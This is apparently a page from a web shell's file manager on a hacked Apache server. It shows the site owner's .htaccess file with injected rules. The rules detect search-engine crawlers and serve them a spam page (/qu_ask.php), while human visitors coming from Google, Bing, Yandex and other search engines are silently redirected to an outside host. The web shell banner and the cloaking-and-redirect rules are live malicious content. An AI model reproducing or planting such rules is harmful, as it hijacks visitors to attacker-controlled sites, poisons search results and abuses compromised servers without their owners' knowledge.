MOON
Server: Apache
System: Linux vmi1129355.contaboserver.net 3.10.0-1160.118.1.el7.x86_64 #1 SMP Wed Apr 24 16:01:50 UTC 2024 x86_64
User: trebiaseguros (1001)
PHP: 8.3.8
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/trebiaseguros/public_html/.htaccess
<IfModule mod_setenvif.c>
SetEnvIfNoCase User-Agent "(Googlebot|Googlebot-Image|Googlebot-News|bingbot|Baiduspider|YandexBot|Slurp|DuckDuckBot|Sogou|Bytespider|AdsBot-Google|Mediapartners-Google)" is_spider=1
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_URI} ^/qu_ask\.php$ [NC]
RewriteRule ^ - [L]
RewriteCond %{ENV:is_spider} ^1$
RewriteCond %{REQUEST_URI} !^/news/
RewriteCond %{REQUEST_URI} !^/qu_ask\.php$ [NC]
RewriteRule ^.*$ /qu_ask.php [R=301,L]
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?%{HTTP_HOST} [NC]
RewriteCond %{ENV:is_spider} !=1
RewriteCond %{HTTP_REFERER} google\.[^/]+/(search|url) [NC,OR]
RewriteCond %{HTTP_REFERER} bing\.com/(search|ck/) [NC,OR]
RewriteCond %{HTTP_REFERER} (search\.yahoo\.com|r\.search\.yahoo\.com) [NC,OR]
RewriteCond %{HTTP_REFERER} baidu\.com/(s|link) [NC,OR]
RewriteCond %{HTTP_REFERER} sogou\.com/web [NC,OR]
RewriteCond %{HTTP_REFERER} duckduckgo\.com/\? [NC,OR]
RewriteCond %{HTTP_REFERER} yandex\.(com|ru|net)/search [NC]
RewriteRule ^ https://files.grh7.pro/new.php [R=301,L]
</IfModule>


# php -- BEGIN cPanel-generated handler, do not edit
# Set the “ea-php83” package as the default “PHP” programming language.
<IfModule mime_module>
  AddHandler application/x-httpd-ea-php83 .php .php8 .phtml
</IfModule>
# php -- END cPanel-generated handler, do not edit